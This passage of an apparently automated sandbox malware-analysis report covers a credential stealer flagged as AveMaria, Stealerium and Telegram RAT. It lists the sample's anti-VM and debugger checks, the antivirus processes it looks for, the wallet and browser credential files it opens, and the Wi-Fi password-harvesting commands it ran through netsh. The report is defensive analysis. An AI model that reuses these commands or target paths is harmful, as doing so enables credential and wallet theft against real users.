                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA 3D
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Video
                          Source: JOUNLV.exe, 00000001.00000002.2023007732.000001BB50803000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: JOUNLV.exe.0.drBinary or memory string: vmware
                          Source: JOUNLV.exe.0.drBinary or memory string: vmicshutdown
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
                          Source: JOUNLV.exe, 00000001.00000002.2021806149.000001BB50699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                          Source: JOUNLV.exe.0.drBinary or memory string: vmicvss
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware svga 3d
                          Source: JOUNLV.exe, 00000001.00000002.2014857223.000001BB362CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, Info.txt.1.drBinary or memory string: VirtualMachine: False
                          Source: JOUNLV.exe, 00000001.00000002.2021806149.000001BB50660000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drBinary or memory string: VirtualMachine:
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}3%j
                          Source: JOUNLV.exe.0.drBinary or memory string: vmicheartbeat
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeAPI call chain: ExitProcess graph end nodegraph_0-83556
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          .NET source code references suspicious native API functions
                          Source: JOUNLV.exe.0.dr, Decryptor.csReference to suspicious API methods: WinApi.LoadLibrary(sPath + "\\mozglue.dll")
                          Source: JOUNLV.exe.0.dr, Decryptor.csReference to suspicious API methods: WinApi.GetProcAddress(_hNss3, "NSS_Init")
                          Source: JOUNLV.exe.0.dr, Keylogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess created: C:\Users\user\AppData\Local\Temp\JOUNLV.exe "C:\Users\user\AppData\Local\Temp\JOUNLV.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" "Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\openfiles.exe OPENFILESJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /PID 4828
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /PID 4828
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager#
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: LKxcbzlwkz.exeBinary or memory string: Shell_TrayWnd
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerA
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager,
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerR
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager^
                          Source: LKxcbzlwkz.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

                          Language, Device and Operating System Detection

                          barindex
                          Yara detected Telegram Recon
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED
                          Source: C:\Windows\SysWOW64\openfiles.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeQueries volume information: C:\Users\user\AppData\Local\Temp\JOUNLV.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Uses netsh to modify the Windows network and firewall settings
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fpavserver.exe
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdss.exe
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001248236.0000000003CFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbamtray.exe
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgnt.exe
                          Source: JOUNLV.exe, 00000001.00000002.2021806149.000001BB5071C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rogramFiles%\Windows Defender\MsMpeng.exe
                          Source: JOUNLV.exe, 00000001.00000002.2021068454.000001BB505A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: savservice.exe
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001248236.0000000003CFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ufseagnt.exe
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected AveMaria stealer
                          Source: Yara matchFile source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
                          Yara detected Stealerium
                          Source: Yara matchFile source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH.zip, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum!Electrum\wallets
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bytecoinJaxxicom.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2y
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0C:\Users\user\AppData\Roaming\Ethereum\keystore2y
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus)Exodus\exodus.wallet
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: &C:\Users\user\AppData\Roaming\Binance2y
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum#Ethereum\keystore
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2y
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum#Ethereum\keystore
                          Tries to harvest and steal WLAN passwords
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Tries to steal Mail credentials (via file / registry access)
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_8.}
                          Source: LKxcbzlwkz.exeBinary or memory string: WIN_XP
                          Source: LKxcbzlwkz.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|betah@Wj
                          Source: LKxcbzlwkz.exeBinary or memory string: WIN_XPe
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|beta
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001298517.0000000003D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crosoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|beta75F00373208B7DF0037B24C745
                          Source: LKxcbzlwkz.exeBinary or memory string: WIN_VISTA
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|betaP@
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001248236.0000000003CFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|r
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_7
                          Source: LKxcbzlwkz.exeBinary or memory string: WIN_8
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|betaJ@uj
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3001223376.0000000003CDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Microsoft Office Click-to-Run|x|user|WIN_8|X64|No|No|On|ddd|x|betav@Aj
                          Source: Yara matchFile source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected AveMaria stealer
                          Source: Yara matchFile source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
                          Yara detected Stealerium
                          Source: Yara matchFile source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH.zip, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
